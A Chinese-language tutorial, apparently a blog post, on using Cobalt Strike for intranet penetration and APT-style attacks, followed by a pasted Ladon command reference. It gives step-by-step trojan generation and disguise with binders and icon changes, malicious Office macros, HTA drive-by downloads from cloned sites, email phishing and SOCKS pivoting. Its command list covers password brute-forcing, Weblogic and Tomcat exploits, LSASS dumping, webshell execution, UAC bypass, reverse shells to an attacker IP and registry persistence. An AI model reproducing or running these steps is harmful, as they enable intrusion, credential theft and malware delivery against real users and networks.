apt可使用工具Cobalt Strike,cs主要用于内网渗透以及APT攻击。
1. cs使用
服务器端:kali(192.168.60.)
客户端:windows(192.168.60.17)
1.启动服务器端:
在安装目录下使用命令 ./teamserver ip 123456(密码)
2.连接客户端:
1.1 主机上线
1.选择监听器,创建payload
2.生成木马
选择攻击---生成木马---windows Executa... ,选择刚才设置的监听器。
3.将生成的exe文件放在靶机上。
可以使用软件安防文件捆绑器对两个exe文件进行捆绑和改变图标。
使用KilerRat可以将exe文件改变为其他后缀名的文件。
3.在靶机运行之后就可以在客户端查看并进行操作。
1.2 结合metesploit,反弹shell
使用cs3.14版本,客户端是cobaltstrike.bat
1.在kali中输入mafconsole,进入msf.并进行设置
2.在靶机中
使用Cobalt Strike创建一个windows/foreign/reverse_http的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。
3.选择增加会话,之后就可以在kali上看到的会话信息。
建立会话:
1.3 office宏payload应用
1.在win7上安装office 2003,然后再cs客户端生成木马,并选择监听器。
选择攻击--生成后门--ms office...--选择监听器。并将生成的文件复制到靶机中。
2.打开office软件,把cs生成的代码放到word宏里。
一般是word默认禁用所有宏(在工具----宏--安全性--选择低)
,另外应用位置不要设置所有的活动模板和文档,建设应用在当前文档。
创建宏:
3.运行文档时可在cs客户端查看到新的会话。
1.4 https payload的应用
可以免查杀,做到开机自启动。
1.5 信息收集
网站短链接生成:https://tool.chinaz.com/tools/dwz.aspx
1.选择攻击---钓鱼攻击---信息收集
2.填写信息之后点击开始,将生成的url进行复制
3.打开短连接生成地址,将刚才复制的url进行短链接生成。
4.将生成的短链接进行访问,可在视图--应用信息,查看到访问的url信息。
可用于验证ssrf,csrf漏洞是否真实存在,通过查看点击链接之后在cs客户端查看应用信息,是否进行页面跳转。
1.6 hta网页挂马
1.先生成hta文件,选择攻击---生成后门---html Application....选择监听器,将method改为powershell。选择保存。
2.使用文件下载。并进行设置。
点击开始之后,evil.hta文件会自动上传到cs目录下的uploads文件夹下。
3.克隆网站,并进行设置。
攻击---钓鱼攻击--克隆网站。
http://192.168.60.67:1245/evil.hta
4.把生成的链接复制出来到浏览器。
下载文件运行之后,可以在web日志看到刚才输入的数据。
1.7 邮件钓鱼
1.点击攻击--邮件钓鱼,将下面内容填写完整。
mail server:填写的是发件人的账号,smtp授权码,端口等信息。
邮件内容是由邮箱中下载进行修改而来的。
在邮箱中开启smtp服务。
3.可以在收件箱看到刚才发送的邮件。
1.8 Socks代理应用(横向渗透)
本次实验需要三台虚拟机,kali(cs服务器端),2007(60网段/0网段 ip192.168.0.2)、2010(0网段(192.168.0.3),是被控制的机器,作为跳板攻击内网)
1.给2007系统添加一个网卡,并设置lan网段。
并设置第二张网卡IP是192.168.0.2
设置win10系统ip为192.168.0.3
2.设置cs客户端。设置代理端口。端口号为25172
2.查看已搭建的代理。并点击Tunnel 将点击之后生成的代码复制到msf中运行。这样就可以利用msf远程攻击192.168.0.3所在的主机。
3.利用msf模块直接攻击
1.8.2 设置kali的软件socks代理
1.可以开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键Pivoting->SOCKS Server
beacon> socks 端口号
[+] started SOCKS4a server on: 2222
[+] host called home, sent: 16 bytes
然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器。
socks4 127.0.0.1 端口号
例子:
使用proxychains代理扫描内网主机 proxychains nmap -sP 192.168.183.0/24。
在使用的插件前都加上proxychains。
2.也可以在连接的主机上通过
设置 中转---Deploy vpn设置虚拟网卡就行内网渗透。
1.9 cs提权和内网渗透
需要在guthub上下载插件:
https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/Aggressor
landon用法:http://k8gege.org/Ladon/
##### 001 多协议探测存活主机 (IP、机器名、MAC地址、制造商)
Ladon 192.168.1.8/24 OnlinePC
##### 002 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan
##### 003 扫描存活主机
Ladon 192.168.1.8/24 OnlineIP
##### 004 ICMP扫描存活主机
Ladon 192.168.1.8/24 Ping
##### 005 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010
##### 006 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost
##### []007 扫描Web信息/Http服务
Ladon 192.168.1.8/24 WebScan
##### []008 扫描C段站点URL域名
Ladon 192.168.1.8/24 UrlScan
##### 009 扫描C段站点URL域名
Ladon 192.168.1.8/24 SameWeb
##### 010 扫描子域名、二级域名
Ladon baidu.com SubDomain
##### 011 域名解析IP、主机名解析IP
Ladon baidu.com DomainIP Ladon baidu.com HostIP
#####012 域内机器信息获取
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
##### 013 扫描C段端口、指定端口扫描
Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389
##### 014 扫描C段WEB以及CMS(75种Web指纹识别)
Ladon 192.168.1.8/24 WhatCMS
##### 015 扫描思科设备
Ladon 192.168.1.8/24 CiscoScan Ladon [http://192.168.1.8](http://192.168.1.8/) CiscoScan
##### [016 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)
Ladon EnumMssql
##### 017 枚举网络共享资源 (域、存活IP、共享路径)
Ladon EnumShare
##### 018 扫描LDAP服务器
Ladon 192.168.1.8/24 LdapScan
##### 019 扫描FTP服务器
Ladon 192.168.1.8/24 FtpScan
###暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆
密码爆破详解参考SSH:[http://k8gege.org/Ladon/sshscan.html](http://k8gege.org/Ladon/sshscan.html)
#####020 445端口 SMB密码爆破(Windows)
Ladon 192.168.1.8/24 SmbScan
#####021 135端口 Wmi密码爆破(Windowns)
Ladon 192.168.1.8/24 WmiScan
##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)
Ladon 192.168.1.8/24 LdapScan
##### 023 5985端口 Winrm密码爆破(Windowns)
Ladon 192.168.1.8/24 WinrmScan.ini
##### 024 445端口 SMB NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 SmbHashScan
##### 025 135端口 Wmi NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 WmiHashScan
##### 026 22端口 SSH密码爆破(Linux)
Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan
##### 027 1433端口 Mssql数据库密码爆破
Ladon 192.168.1.8/24 MssqlScan
##### 028 1521端口 Oracle数据库密码爆破
Ladon 192.168.1.8/24 OracleScan
##### 029 3306端口 Mysql数据库密码爆破
Ladon 192.168.1.8/24 MysqlScan
##### 030 7001端口 Weblogic后台密码爆破
Ladon [http://192.168.1.8:7001/console](http://192.168.1.8:7001/console) WeblogicScan Ladon 192.168.1.8/24 WeblogicScan
##### [031 5900端口 VNC远程桌面密码爆破
Ladon 192.168.1.8/24 VncScan
##### 032 21端口 Ftp服务器密码爆破
Ladon 192.168.1.8/24 FtpScan
#####033 8080端口 Tomcat后台登陆密码爆破
Ladon 192.168.1.8/24 TomcatScan Ladon [http://192.168.1.8:8080/manage](http://192.168.1.8:8080/manage) TomcatScan
##### 034 Web端口 401基础认证密码爆破
Ladon [http://192.168.1.8/login](http://192.168.1.8/login) HttpBasicScan
##### 035 445端口 Impacket SMB密码爆破(Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
##### 036 445端口 IPC密码爆破(Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
### []漏洞检测/漏洞利用/Poc/Exp
##### [](https://github.com/k8gege/Aggressor#037-smb%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8Bcve-2017-0143cve-2017-0144)037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
#####038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
#####039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
Ladon 192.168.1.8/24 PhpStudyPoc
##### 040 ActiveMQ漏洞检测(CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
#####041 Tomcat漏洞检测(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
##### 042 Weblogic漏洞利用(CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
##### 043 Tomcat漏洞利用(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
### FTP下载、HTTP下载
##### 045 HTTP下载
Ladon HttpDownLoad [http://k8gege.org/Download/Ladon.rar](http://k8gege.org/Download/Ladon.rar)
##### 046 Ftp下载
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### 加密解密(HEX/Base64)
##### 047 Hex加密解密
Ladon 123456 EnHex Ladon 313233343536 DeHex
##### [](https://github.com/k8gege/Aggressor#048-base64%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86)048 Base64加密解密
Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64
### 网络嗅探
##### 049 Ftp密码嗅探
Ladon FtpSniffer 192.168.1.5
##### 050 HTTP密码嗅探
Ladon HTTPSniffer 192.168.1.5
##### 051 网络嗅探
Ladon Sniffer
###密码读取
##### 052 读取IIS站点密码、网站路径
Ladon IISpwd
##### DumpLsass内存密码
Ladon DumpLsass
### 信息收集
#####053 进程详细信息
Ladon EnumProcess Ladon Tasklist
#####054 获取命令行参数
Ladon cmdline Ladon cmdline cmd.exe
#####055 获取渗透基础信息
Ladon GetInfo Ladon GetInfo2
##### 056 .NET & PowerShell版本
Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion
##### 057 运行时版本&编译环境
Ladon Ver Ladon Version
### 远程执行(psexec/wmiexec/atexec/sshexec)
#####445端口 PSEXEC远程执行命令(交互式)
net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system
##### 058 135端口 WmiExec远程执行命令 (非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
##### 059 445端口 AtExec远程执行命令(非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
#####060 22端口 SshExec远程执行命令(非交互式)
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 061 JspShell远程执行命令(非交互式)
Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua [http://192.168.1.8/shell.jsp](http://192.168.1.8/shell.jsp) Ladon whoami
#### 062 WebShell远程执行命令(非交互式)
source-shell
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
### 提权降权
##### 063 BypassUac 绕过UAC执行,支持Win7-Win10
Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat
##### 064 GetSystem 提权或降权运行程序
Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer
##### 065 Runas 模拟用户执行命令
Ladon Runas user pass cmd
### 其它功能
#####066 一键启用.net 3.5
Ladon EnableDotNet
##### 067 获取内网站点HTML源码
Ladon gethtml [http://192.168.1.1](http://192.168.1.1/)
#####068 检测后门
Ladon CheckDoor Ladon AutoRun
##### 069 获取本机内网IP与外网IP
Ladon GetIP
##### 070 一键迷你WEB服务器
Ladon WebSer 80 Ladon web 80
### []反弹Shell
##### 071 反弹TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
##### 072 反弹TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 073 反弹TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
##### 074 反弹HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
#####075 反弹HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
##### 076 反弹TCP CMD & PowerShell Shell
Ladon PowerCat -r 192.168.1.8 4444 cmd Ladon PowerCat -r 192.168.1.8 4444 psh
##### 077 反弹UDP Cmd & PowerShell Shell
Ladon PowerCat -r 192.168.1.110 4444 cmd -u Ladon PowerCat -r 192.168.1.8 4444 psh -u
##### 078 RDP桌面会话劫持(无需密码)
Ladon RDPHijack 3 Ladon RDPHijack 3 console
##### 079 OXID定位多网卡主机
Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan
#### 080 查看用户最近访问文件
Ladon Recent
#### 081 添加注册表Run启动项
Ladon RegAuto Test c:\123.exe
####082 AT计划执行程序(无需时间)(system权限)
Ladon at c:\123.exe Ladon at c:\123.exe gui
#### 083 SC服务加启动项&执行程序(system权限)
Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName
1.安装插件,选择脚本管理器---load.
加载之后再选择提权,重新选择exploit。就可以进行提权。